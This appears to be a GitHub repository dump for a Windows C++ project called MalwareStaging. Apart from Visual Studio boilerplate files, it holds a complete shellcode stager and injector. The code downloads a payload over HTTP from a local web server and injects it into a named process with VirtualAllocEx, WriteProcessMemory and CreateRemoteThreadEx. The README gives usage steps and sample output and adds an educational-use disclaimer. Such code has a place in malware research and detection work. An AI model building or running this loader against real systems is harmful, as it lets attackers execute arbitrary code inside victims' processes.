├── MalwareStaging ├── MalwareStaging.vcxproj.filters ├── MalwareStaging.cpp └── MalwareStaging.vcxproj ├── MalwareStaging.sln ├── .gitattributes ├── README.md └── .gitignore /MalwareStaging/MalwareStaging.vcxproj.filters: -------------------------------------------------------------------------------- 1 | 2 | 3 | 4 | 5 | {4FC737F1-C7A5-4376-A066-2A32D752A2FF} 6 | cpp;c;cc;cxx;c++;cppm;ixx;def;odl;idl;hpj;bat;asm;asmx 7 | 8 | 9 | {93995380-89BD-4b04-88EB-625FBE52EBFB} 10 | h;hh;hpp;hxx;h++;hm;inl;inc;ipp;xsd 11 | 12 | 13 | {67DA6AB6-F800-4c08-8B7A-83BB121AAD01} 14 | rc;ico;cur;bmp;dlg;rc2;rct;bin;rgs;gif;jpg;jpeg;jpe;resx;tiff;tif;png;wav;mfcribbon-ms 15 | 16 | 17 | 18 | 19 | Source Files 20 | 21 | 22 | Source Files 23 | 24 | 25 | -------------------------------------------------------------------------------- /MalwareStaging.sln: -------------------------------------------------------------------------------- 1 | 2 | Microsoft Visual Studio Solution File, Format Version 12.00 3 | # Visual Studio Version 17 4 | VisualStudioVersion = 17.10.35004.147 5 | MinimumVisualStudioVersion = 10.0.40219.1 6 | Project("{8BC9CEB8-8B4A-11D0-8D11-00A0C91BC942}") = "MalwareStaging", "MalwareStaging\MalwareStaging.vcxproj", "{F1FCC80C-E16B-4B67-8CB6-85B919BDF7E4}" 7 | EndProject 8 | Global 9 | GlobalSection(SolutionConfigurationPlatforms) = preSolution 10 | Debug|x64 = Debug|x64 11 | Debug|x86 = Debug|x86 12 | Release|x64 = Release|x64 13 | Release|x86 = Release|x86 14 | EndGlobalSection 15 | GlobalSection(ProjectConfigurationPlatforms) = postSolution 16 | {F1FCC80C-E16B-4B67-8CB6-85B919BDF7E4}.Debug|x64.ActiveCfg = Debug|x64 17 | {F1FCC80C-E16B-4B67-8CB6-85B919BDF7E4}.Debug|x64.Build.0 = Debug|x64 18 | {F1FCC80C-E16B-4B67-8CB6-85B919BDF7E4}.Debug|x86.ActiveCfg = Debug|Win32 19 | {F1FCC80C-E16B-4B67-8CB6-85B919BDF7E4}.Debug|x86.Build.0 = Debug|Win32 20 | {F1FCC80C-E16B-4B67-8CB6-85B919BDF7E4}.Release|x64.ActiveCfg = Release|x64 21 | {F1FCC80C-E16B-4B67-8CB6-85B919BDF7E4}.Release|x64.Build.0 = Release|x64 22 | {F1FCC80C-E16B-4B67-8CB6-85B919BDF7E4}.Release|x86.ActiveCfg = Release|Win32 23 | {F1FCC80C-E16B-4B67-8CB6-85B919BDF7E4}.Release|x86.Build.0 = Release|Win32 24 | EndGlobalSection 25 | GlobalSection(SolutionProperties) = preSolution 26 | HideSolutionNode = FALSE 27 | EndGlobalSection 28 | GlobalSection(ExtensibilityGlobals) = postSolution 29 | SolutionGuid = {90172BDC-0B23-4F31-A8A0-C075D88EACE2} 30 | EndGlobalSection 31 | EndGlobal 32 | -------------------------------------------------------------------------------- /.gitattributes: -------------------------------------------------------------------------------- 1 | ############################################################################### 2 | # Set default behavior to automatically normalize line endings. 3 | ############################################################################### 4 | * text=auto 5 | 6 | ############################################################################### 7 | # Set default behavior for command prompt diff. 8 | # 9 | # This is need for earlier builds of msysgit that does not have it on by 10 | # default for csharp files. 11 | # Note: This is only used by command line 12 | ############################################################################### 13 | #*.cs diff=csharp 14 | 15 | ############################################################################### 16 | # Set the merge driver for project and solution files 17 | # 18 | # Merging from the command prompt will add diff markers to the files if there 19 | # are conflicts (Merging from VS is not affected by the settings below, in VS 20 | # the diff markers are never inserted). Diff markers may cause the following 21 | # file extensions to fail to load in VS. An alternative would be to treat 22 | # these files as binary and thus will always conflict and require user 23 | # intervention with every merge. To do so, just uncomment the entries below 24 | ############################################################################### 25 | #*.sln merge=binary 26 | #*.csproj merge=binary 27 | #*.vbproj merge=binary 28 | #*.vcxproj merge=binary 29 | #*.vcproj merge=binary 30 | #*.dbproj merge=binary 31 | #*.fsproj merge=binary 32 | #*.lsproj merge=binary 33 | #*.wixproj merge=binary 34 | #*.modelproj merge=binary 35 | #*.sqlproj merge=binary 36 | #*.wwaproj merge=binary 37 | 38 | ############################################################################### 39 | # behavior for image files 40 | # 41 | # image files are treated as binary by default. 42 | ############################################################################### 43 | #*.jpg binary 44 | #*.png binary 45 | #*.gif binary 46 | 47 | ############################################################################### 48 | # diff behavior for common document formats 49 | # 50 | # Convert binary document formats to text before diffing them. This feature 51 | # is only available from the command line. Turn it on by uncommenting the 52 | # entries below. 53 | ############################################################################### 54 | #*.doc diff=astextplain 55 | #*.DOC diff=astextplain 56 | #*.docx diff=astextplain 57 | #*.DOCX diff=astextplain 58 | #*.dot diff=astextplain 59 | #*.DOT diff=astextplain 60 | #*.pdf diff=astextplain 61 | #*.PDF diff=astextplain 62 | #*.rtf diff=astextplain 63 | #*.RTF diff=astextplain 64 | -------------------------------------------------------------------------------- /README.md: -------------------------------------------------------------------------------- 1 | # MalwareStaging 2 | ### Overview 3 | **R0m4InShell** is a proof-of-concept (PoC) project showcasing a malware staging website. It demonstrates how to download and inject a malicious payload (shellcode) into a target process on a remote system. The tool connects to a web server to retrieve the staged shellcode, injects it into the target process, and executes it. 4 | 5 | This project highlights the techniques used in malware delivery and execution, including process injection and remote thread creation. It is intended for research, education, and security testing purposes. 6 | 7 | ### Features 8 | - **Shellcode Staging**: Retrieves the shellcode from a remote URL. 9 | - **Process Injection**: Injects shellcode into a running process using `CreateRemoteThread`. 10 | - **Remote Payload Execution**: Executes the downloaded shellcode within the context of the injected process. 11 | - **Detailed Logging**: Logs each step of the process from URL connection, downloading shellcode, process enumeration, and injection. 12 | 13 | ### Usage 14 | 1. **Configure Web Server**: Host the shellcode on a web server. 15 | 2. **Run the Tool**: Execute the binary with the target process name as an argument: 16 | ``` 17 | R0m4InShell.exe 18 | ``` 19 | Example: 20 | ``` 21 | R0m4InShell.exe notepad.exe 22 | ``` 23 | 3. **Monitor** the console output for detailed logs, including the shellcode download, process handling, and remote thread creation. 24 | 25 | ### How It Works 26 | 1. The tool establishes a connection to a remote web server and downloads a staged shellcode. 27 | 2. It then enumerates running processes to find the specified target. 28 | 3. Once the process is found, the tool allocates memory in the target process and writes the shellcode into it. 29 | 4. Finally, the shellcode is executed by creating a remote thread in the target process. 30 | 31 | ### Example Shellcode 32 | The provided shellcode is a demonstration payload, but the tool can be adapted to use custom shellcodes for various purposes. 33 | 34 | ### Prerequisites 35 | - Windows operating system. 36 | - Visual Studio or any compatible C/C++ compiler. 37 | - A web server hosting the shellcode. 38 | 39 | ### Disclaimer 40 | This project is for educational and research purposes only. It should only be used in controlled environments, and the author does not endorse or encourage any illegal activities. 41 | 42 | --- 43 | 44 | ### Example Output 45 | ``` 46 | Connection has been established. 47 | URL has been opened. 48 | Downloaded 600 bytes. 49 | Checking process: notepad.exe 50 | Great! We found the process: notepad.exe with PID: 1234 51 | Allocated 600-bytes with PAGE_EXECUTE_READWRITE permissions inside 1234 52 | Wrote 600-bytes to process memory 53 | We got handle on the Thread 5678 ----------0x000000000000 54 | Waiting for thread to finish... 55 | Thread finished executing. 56 | ``` 57 | 58 | --- 59 | -------------------------------------------------------------------------------- /MalwareStaging/MalwareStaging.cpp: -------------------------------------------------------------------------------- 1 | #include 2 | #include 3 | #include 4 | #include 5 | #include 6 | #include 7 | 8 | 9 | // Some macros to help in the process of writing and printing texts 10 | #define okay(msg, ...) printf("[+]" msg "\n", __VA_ARGS__) 11 | #define info(msg, ...) printf("[+]" msg "\n", __VA_ARGS__) 12 | #define warning(msg, ...) printf("[-]" msg "\n", __VA_ARGS__) 13 | 14 | 15 | 16 | PROCESSENTRY32 Proc; 17 | HANDLE hProcess, hThread = NULL; 18 | PBYTE pBytes = NULL; 19 | DWORD dwBytesRead; 20 | 21 | // Function to download shellcode from a URL 22 | PBYTE downloadShellcode(const wchar_t* url, DWORD* shellcodeSize) { 23 | HINTERNET hInternet = InternetOpenW(L"Shellcode Downloader", INTERNET_OPEN_TYPE_DIRECT, NULL, NULL, NULL); 24 | if (!hInternet) { 25 | printf("We can't connect to the Internet error: %lx\n", GetLastError()); 26 | return NULL; 27 | } 28 | printf("Connection has been established.\n"); 29 | 30 | HINTERNET hUrl = InternetOpenUrlW(hInternet, url, NULL, 0, INTERNET_FLAG_HYPERLINK | INTERNET_FLAG_IGNORE_CERT_DATE_INVALID, 0); 31 | if (!hUrl) { 32 | printf("We can't open the URL error: %lx\n", GetLastError()); 33 | InternetCloseHandle(hInternet); 34 | return NULL; 35 | } 36 | printf("URL has been opened.\n"); 37 | 38 | // Allocate memory for shellcode (600 bytes for example) 39 | pBytes = (PBYTE)LocalAlloc(LPTR, 600); 40 | if (!pBytes) { 41 | printf("Memory allocation failed.\n"); 42 | InternetCloseHandle(hUrl); 43 | InternetCloseHandle(hInternet); 44 | return NULL; 45 | } 46 | 47 | if (!InternetReadFile(hUrl, pBytes, 600, shellcodeSize)) { 48 | printf("Error reading file: %lx\n", GetLastError()); 49 | LocalFree(pBytes); 50 | InternetCloseHandle(hUrl); 51 | InternetCloseHandle(hInternet); 52 | return NULL; 53 | } 54 | 55 | printf("Downloaded %lu bytes.\n", *shellcodeSize); 56 | InternetCloseHandle(hUrl); 57 | InternetCloseHandle(hInternet); 58 | return pBytes; 59 | } 60 | 61 | int main(int argc, char* argv[]) { 62 | if (argc < 2) { 63 | warning("You must enter the process name to inject the shellcode!\nUSAGE: R0m4.exe "); 64 | return EXIT_FAILURE; 65 | } 66 | 67 | DWORD PID, TID = NULL; 68 | WCHAR target[MAX_PATH]; 69 | size_t convertedChars = 0; 70 | mbstowcs_s(&convertedChars, target, MAX_PATH, argv[1], _TRUNCATE); 71 | 72 | // Step 1: Download the shellcode from a remote URL 73 | DWORD shellcodeSize = 0; 74 | PBYTE shellcode = downloadShellcode(L"http://127.0.0.1:8000/calc.bin", &shellcodeSize); 75 | if (!shellcode) { 76 | warning("Failed to download shellcode.\n"); 77 | return EXIT_FAILURE; 78 | } 79 | 80 | 81 | for (DWORD i = 0; i < dwBytesRead; i++) { 82 | printf("%02X ", pBytes[i]); 83 | if ((i + 1) % 16 == 0) printf("\n"); // Print 16 bytes per line for readability 84 | } 85 | 86 | 87 | // Step 2: Find the target process 88 | HANDLE hSnapshot = CreateToolhelp32Snapshot(TH32CS_SNAPPROCESS, 0); 89 | if (hSnapshot == INVALID_HANDLE_VALUE) { 90 | LocalFree(shellcode); 91 | return 1; 92 | } 93 | Proc.dwSize = sizeof(PROCESSENTRY32); 94 | 95 | if (!Process32First(hSnapshot, &Proc)) { 96 | LocalFree(shellcode); 97 | CloseHandle(hSnapshot); 98 | return 1; 99 | } 100 | 101 | do { 102 | printf("Checking process: %ls\n", Proc.szExeFile); 103 | if (wcscmp(Proc.szExeFile, target) == 0) { 104 | PID = Proc.th32ProcessID; 105 | okay("Found the process: %ls with PID: %ld\n", target, PID); 106 | break; 107 | } 108 | } while (Process32Next(hSnapshot, &Proc)); 109 | 110 | CloseHandle(hSnapshot); 111 | 112 | if (!PID) { 113 | warning("Target process not found.\n"); 114 | LocalFree(shellcode); 115 | return EXIT_FAILURE; 116 | } 117 | 118 | // Step 3: Open the target process 119 | info("Attempting to open process with ID: %ld\n", PID); 120 | hProcess = OpenProcess(PROCESS_ALL_ACCESS, FALSE, PID); 121 | if (hProcess == NULL) { 122 | warning("Unable to open process with PID %ld. Error: %ld\n", PID, GetLastError()); 123 | LocalFree(shellcode); 124 | return EXIT_FAILURE; 125 | } 126 | 127 | info("Successfully opened the process.\n"); 128 | 129 | // Step 4: Allocate memory in the target process 130 | LPVOID rBuffer = VirtualAllocEx(hProcess, NULL, shellcodeSize, (MEM_COMMIT | MEM_RESERVE), PAGE_EXECUTE_READWRITE); 131 | if (!rBuffer) { 132 | warning("Memory allocation failed in target process.\n"); 133 | CloseHandle(hProcess); 134 | LocalFree(shellcode); 135 | return EXIT_FAILURE; 136 | } 137 | info("Allocated %lu bytes with PAGE_EXECUTE_READWRITE in process %ld\n", shellcodeSize, PID); 138 | 139 | // Step 5: Write shellcode into the target process 140 | WriteProcessMemory(hProcess, rBuffer, shellcode, shellcodeSize, NULL); 141 | info("Wrote %lu bytes to process memory.\n", shellcodeSize); 142 | 143 | // Step 6: Create remote thread in the target process 144 | hThread = CreateRemoteThreadEx(hProcess, NULL, 0, (LPTHREAD_START_ROUTINE)rBuffer, NULL, 0, 0, &TID); 145 | if (!hThread) { 146 | warning("Unable to create remote thread in process with PID %ld. Error: %ld\n", PID, GetLastError()); 147 | VirtualFreeEx(hProcess, rBuffer, 0, MEM_RELEASE); 148 | CloseHandle(hProcess); 149 | LocalFree(shellcode); 150 | return EXIT_FAILURE; 151 | } 152 | okay("Created remote thread %ld (0x%p) in process.\n", TID, hThread); 153 | 154 | // Step 7: Wait for the thread to finish and clean up 155 | WaitForSingleObject(hThread, INFINITE); 156 | info("Thread finished executing.\n"); 157 | 158 | // Cleanup 159 | CloseHandle(hThread); 160 | CloseHandle(hProcess); 161 | LocalFree(shellcode); 162 | 163 | info("Process finished. See you next time!\n"); 164 | return EXIT_SUCCESS; 165 | } 166 | -------------------------------------------------------------------------------- /MalwareStaging/MalwareStaging.vcxproj: -------------------------------------------------------------------------------- 1 | 2 | 3 | 4 | 5 | Debug 6 | Win32 7 | 8 | 9 | Release 10 | Win32 11 | 12 | 13 | Debug 14 | x64 15 | 16 | 17 | Release 18 | x64 19 | 20 | 21 | 22 | 23 | 24 | 25 | 26 | 17.0 27 | Win32Proj 28 | {f1fcc80c-e16b-4b67-8cb6-85b919bdf7e4} 29 | MalwareStaging 30 | 10.0 31 | 32 | 33 | 34 | Application 35 | true 36 | v143 37 | Unicode 38 | 39 | 40 | Application 41 | false 42 | v143 43 | true 44 | Unicode 45 | 46 | 47 | Application 48 | true 49 | v143 50 | Unicode 51 | 52 | 53 | Application 54 | false 55 | v143 56 | true 57 | Unicode 58 | 59 | 60 | 61 | 62 | 63 | 64 | 65 | 66 | 67 | 68 | 69 | 70 | 71 | 72 | 73 | 74 | 75 | 76 | 77 | 78 | 79 | Level3 80 | true 81 | WIN32;_DEBUG;_CONSOLE;%(PreprocessorDefinitions) 82 | true 83 | 84 | 85 | Console 86 | true 87 | 88 | 89 | 90 | 91 | Level3 92 | true 93 | true 94 | true 95 | WIN32;NDEBUG;_CONSOLE;%(PreprocessorDefinitions) 96 | true 97 | 98 | 99 | Console 100 | true 101 | true 102 | true 103 | 104 | 105 | 106 | 107 | Level3 108 | true 109 | _DEBUG;_CONSOLE;%(PreprocessorDefinitions) 110 | true 111 | 112 | 113 | Console 114 | true 115 | $(CoreLibraryDependencies);%(AdditionalDependencies);wininet.lib 116 | 117 | 118 | 119 | 120 | Level3 121 | true 122 | true 123 | true 124 | NDEBUG;_CONSOLE;%(PreprocessorDefinitions) 125 | true 126 | 127 | 128 | Console 129 | true 130 | true 131 | true 132 | 133 | 134 | 135 | 136 | 137 | -------------------------------------------------------------------------------- /.gitignore: -------------------------------------------------------------------------------- 1 | ## Ignore Visual Studio temporary files, build results, and 2 | ## files generated by popular Visual Studio add-ons. 3 | ## 4 | ## Get latest from https://github.com/github/gitignore/blob/master/VisualStudio.gitignore 5 | 6 | # User-specific files 7 | *.rsuser 8 | *.suo 9 | *.user 10 | *.userosscache 11 | *.sln.docstates 12 | 13 | # User-specific files (MonoDevelop/Xamarin Studio) 14 | *.userprefs 15 | 16 | # Mono auto generated files 17 | mono_crash.* 18 | 19 | # Build results 20 | [Dd]ebug/ 21 | [Dd]ebugPublic/ 22 | [Rr]elease/ 23 | [Rr]eleases/ 24 | x64/ 25 | x86/ 26 | [Ww][Ii][Nn]32/ 27 | [Aa][Rr][Mm]/ 28 | [Aa][Rr][Mm]64/ 29 | bld/ 30 | [Bb]in/ 31 | [Oo]bj/ 32 | [Oo]ut/ 33 | [Ll]og/ 34 | [Ll]ogs/ 35 | 36 | # Visual Studio 2015/2017 cache/options directory 37 | .vs/ 38 | # Uncomment if you have tasks that create the project's static files in wwwroot 39 | #wwwroot/ 40 | 41 | # Visual Studio 2017 auto generated files 42 | Generated\ Files/ 43 | 44 | # MSTest test Results 45 | [Tt]est[Rr]esult*/ 46 | [Bb]uild[Ll]og.* 47 | 48 | # NUnit 49 | *.VisualState.xml 50 | TestResult.xml 51 | nunit-*.xml 52 | 53 | # Build Results of an ATL Project 54 | [Dd]ebugPS/ 55 | [Rr]eleasePS/ 56 | dlldata.c 57 | 58 | # Benchmark Results 59 | BenchmarkDotNet.Artifacts/ 60 | 61 | # .NET Core 62 | project.lock.json 63 | project.fragment.lock.json 64 | artifacts/ 65 | 66 | # ASP.NET Scaffolding 67 | ScaffoldingReadMe.txt 68 | 69 | # StyleCop 70 | StyleCopReport.xml 71 | 72 | # Files built by Visual Studio 73 | *_i.c 74 | *_p.c 75 | *_h.h 76 | *.ilk 77 | *.meta 78 | *.obj 79 | *.iobj 80 | *.pch 81 | *.pdb 82 | *.ipdb 83 | *.pgc 84 | *.pgd 85 | *.rsp 86 | *.sbr 87 | *.tlb 88 | *.tli 89 | *.tlh 90 | *.tmp 91 | *.tmp_proj 92 | *_wpftmp.csproj 93 | *.log 94 | *.vspscc 95 | *.vssscc 96 | .builds 97 | *.pidb 98 | *.svclog 99 | *.scc 100 | 101 | # Chutzpah Test files 102 | _Chutzpah* 103 | 104 | # Visual C++ cache files 105 | ipch/ 106 | *.aps 107 | *.ncb 108 | *.opendb 109 | *.opensdf 110 | *.sdf 111 | *.cachefile 112 | *.VC.db 113 | *.VC.VC.opendb 114 | 115 | # Visual Studio profiler 116 | *.psess 117 | *.vsp 118 | *.vspx 119 | *.sap 120 | 121 | # Visual Studio Trace Files 122 | *.e2e 123 | 124 | # TFS 2012 Local Workspace 125 | $tf/ 126 | 127 | # Guidance Automation Toolkit 128 | *.gpState 129 | 130 | # ReSharper is a .NET coding add-in 131 | _ReSharper*/ 132 | *.[Rr]e[Ss]harper 133 | *.DotSettings.user 134 | 135 | # TeamCity is a build add-in 136 | _TeamCity* 137 | 138 | # DotCover is a Code Coverage Tool 139 | *.dotCover 140 | 141 | # AxoCover is a Code Coverage Tool 142 | .axoCover/* 143 | !.axoCover/settings.json 144 | 145 | # Coverlet is a free, cross platform Code Coverage Tool 146 | coverage*.json 147 | coverage*.xml 148 | coverage*.info 149 | 150 | # Visual Studio code coverage results 151 | *.coverage 152 | *.coveragexml 153 | 154 | # NCrunch 155 | _NCrunch_* 156 | .*crunch*.local.xml 157 | nCrunchTemp_* 158 | 159 | # MightyMoose 160 | *.mm.* 161 | AutoTest.Net/ 162 | 163 | # Web workbench (sass) 164 | .sass-cache/ 165 | 166 | # Installshield output folder 167 | [Ee]xpress/ 168 | 169 | # DocProject is a documentation generator add-in 170 | DocProject/buildhelp/ 171 | DocProject/Help/*.HxT 172 | DocProject/Help/*.HxC 173 | DocProject/Help/*.hhc 174 | DocProject/Help/*.hhk 175 | DocProject/Help/*.hhp 176 | DocProject/Help/Html2 177 | DocProject/Help/html 178 | 179 | # Click-Once directory 180 | publish/ 181 | 182 | # Publish Web Output 183 | *.[Pp]ublish.xml 184 | *.azurePubxml 185 | # Note: Comment the next line if you want to checkin your web deploy settings, 186 | # but database connection strings (with potential passwords) will be unencrypted 187 | *.pubxml 188 | *.publishproj 189 | 190 | # Microsoft Azure Web App publish settings. Comment the next line if you want to 191 | # checkin your Azure Web App publish settings, but sensitive information contained 192 | # in these scripts will be unencrypted 193 | PublishScripts/ 194 | 195 | # NuGet Packages 196 | *.nupkg 197 | # NuGet Symbol Packages 198 | *.snupkg 199 | # The packages folder can be ignored because of Package Restore 200 | **/[Pp]ackages/* 201 | # except build/, which is used as an MSBuild target. 202 | !**/[Pp]ackages/build/ 203 | # Uncomment if necessary however generally it will be regenerated when needed 204 | #!**/[Pp]ackages/repositories.config 205 | # NuGet v3's project.json files produces more ignorable files 206 | *.nuget.props 207 | *.nuget.targets 208 | 209 | # Microsoft Azure Build Output 210 | csx/ 211 | *.build.csdef 212 | 213 | # Microsoft Azure Emulator 214 | ecf/ 215 | rcf/ 216 | 217 | # Windows Store app package directories and files 218 | AppPackages/ 219 | BundleArtifacts/ 220 | Package.StoreAssociation.xml 221 | _pkginfo.txt 222 | *.appx 223 | *.appxbundle 224 | *.appxupload 225 | 226 | # Visual Studio cache files 227 | # files ending in .cache can be ignored 228 | *.[Cc]ache 229 | # but keep track of directories ending in .cache 230 | !?*.[Cc]ache/ 231 | 232 | # Others 233 | ClientBin/ 234 | ~$* 235 | *~ 236 | *.dbmdl 237 | *.dbproj.schemaview 238 | *.jfm 239 | *.pfx 240 | *.publishsettings 241 | orleans.codegen.cs 242 | 243 | # Including strong name files can present a security risk 244 | # (https://github.com/github/gitignore/pull/2483#issue-259490424) 245 | #*.snk 246 | 247 | # Since there are multiple workflows, uncomment next line to ignore bower_components 248 | # (https://github.com/github/gitignore/pull/1529#issuecomment-104372622) 249 | #bower_components/ 250 | 251 | # RIA/Silverlight projects 252 | Generated_Code/ 253 | 254 | # Backup & report files from converting an old project file 255 | # to a newer Visual Studio version. Backup files are not needed, 256 | # because we have git ;-) 257 | _UpgradeReport_Files/ 258 | Backup*/ 259 | UpgradeLog*.XML 260 | UpgradeLog*.htm 261 | ServiceFabricBackup/ 262 | *.rptproj.bak 263 | 264 | # SQL Server files 265 | *.mdf 266 | *.ldf 267 | *.ndf 268 | 269 | # Business Intelligence projects 270 | *.rdl.data 271 | *.bim.layout 272 | *.bim_*.settings 273 | *.rptproj.rsuser 274 | *- [Bb]ackup.rdl 275 | *- [Bb]ackup ([0-9]).rdl 276 | *- [Bb]ackup ([0-9][0-9]).rdl 277 | 278 | # Microsoft Fakes 279 | FakesAssemblies/ 280 | 281 | # GhostDoc plugin setting file 282 | *.GhostDoc.xml 283 | 284 | # Node.js Tools for Visual Studio 285 | .ntvs_analysis.dat 286 | node_modules/ 287 | 288 | # Visual Studio 6 build log 289 | *.plg 290 | 291 | # Visual Studio 6 workspace options file 292 | *.opt 293 | 294 | # Visual Studio 6 auto-generated workspace file (contains which files were open etc.) 295 | *.vbw 296 | 297 | # Visual Studio LightSwitch build output 298 | **/*.HTMLClient/GeneratedArtifacts 299 | **/*.DesktopClient/GeneratedArtifacts 300 | **/*.DesktopClient/ModelManifest.xml 301 | **/*.Server/GeneratedArtifacts 302 | **/*.Server/ModelManifest.xml 303 | _Pvt_Extensions 304 | 305 | # Paket dependency manager 306 | .paket/paket.exe 307 | paket-files/ 308 | 309 | # FAKE - F# Make 310 | .fake/ 311 | 312 | # CodeRush personal settings 313 | .cr/personal 314 | 315 | # Python Tools for Visual Studio (PTVS) 316 | __pycache__/ 317 | *.pyc 318 | 319 | # Cake - Uncomment if you are using it 320 | # tools/** 321 | # !tools/packages.config 322 | 323 | # Tabs Studio 324 | *.tss 325 | 326 | # Telerik's JustMock configuration file 327 | *.jmconfig 328 | 329 | # BizTalk build output 330 | *.btp.cs 331 | *.btm.cs 332 | *.odx.cs 333 | *.xsd.cs 334 | 335 | # OpenCover UI analysis results 336 | OpenCover/ 337 | 338 | # Azure Stream Analytics local run output 339 | ASALocalRun/ 340 | 341 | # MSBuild Binary and Structured Log 342 | *.binlog 343 | 344 | # NVidia Nsight GPU debugger configuration file 345 | *.nvuser 346 | 347 | # MFractors (Xamarin productivity tool) working folder 348 | .mfractor/ 349 | 350 | # Local History for Visual Studio 351 | .localhistory/ 352 | 353 | # BeatPulse healthcheck temp database 354 | healthchecksdb 355 | 356 | # Backup folder for Package Reference Convert tool in Visual Studio 2017 357 | MigrationBackup/ 358 | 359 | # Ionide (cross platform F# VS Code tools) working folder 360 | .ionide/ 361 | 362 | # Fody - auto-generated XML schema 363 | FodyWeavers.xsd --------------------------------------------------------------------------------